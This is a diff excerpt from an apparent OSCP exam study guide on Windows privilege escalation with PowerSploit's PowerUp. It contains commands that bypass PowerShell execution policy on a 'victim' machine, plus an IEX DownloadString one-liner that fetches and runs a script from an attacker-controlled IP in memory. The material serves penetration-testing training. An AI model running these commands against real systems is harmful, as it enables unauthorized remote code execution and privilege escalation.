jkchiefgmailcom/learntohack/OSCP_guide.md

 -   Powershell Priv Escalation Tools https://github.com/PowerShellMafia/PowerSploit

       Download to victim, unzip

-    `echo $Env:PSModulePath` - to see where to locate folder `mkdir C:\Users\username\Documents\WindowsPowerShell\Modules` - create this folder with Copy PowerSploit and Privesc folder to "C:\Users\username\Documents\WindowsPowerShell\Modules"
+          `echo $Env:PSModulePath` - to see where to locate folder `mkdir C:\Users\username\Documents\WindowsPowerShell\Modules` - create this folder with

+      Copy PowerSploit and Privesc folder to "C:\Users\username\Documents\WindowsPowerShell\Modules"

           `powershell.exe -nop -exec bypass`
       cd to PowerSploit folder

          `Import-Module PowerSploit` -  To use the module, type  Import-Module .\PowerSploit.psd1 `Import-Module Privesc` Import-Module PowerUp.ps1
           `Get-Command -Module PowerSploit` - To see the commands imported, type `Get-Help Out-Minidump` - To get help  on some command

           `Invoke-AllChecks -HTMLReport`

       Non-Interractive shells:
       One option is to upload the PowerUp.ps1 script to the machine, drop into a shell, and execute the following command:

-    C:\> `powershell.exe -exec bypass -Command “& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}”`
+          `powershell.exe -exec bypass -Command “& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}”`

       TO invoke everything without touching disk

          C:\Users\lowpriv>`powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://10.11.0.183/PowerSploit/Privesc/PowerUp.ps1');Get-ServiceUnquoted"`

 -   Windows Run As - Switching users in linux is trival with the `SU` command.
 However, an equivalent command does not exist in Windows.
 Here are 3 ways to run a command as a different user in Windows.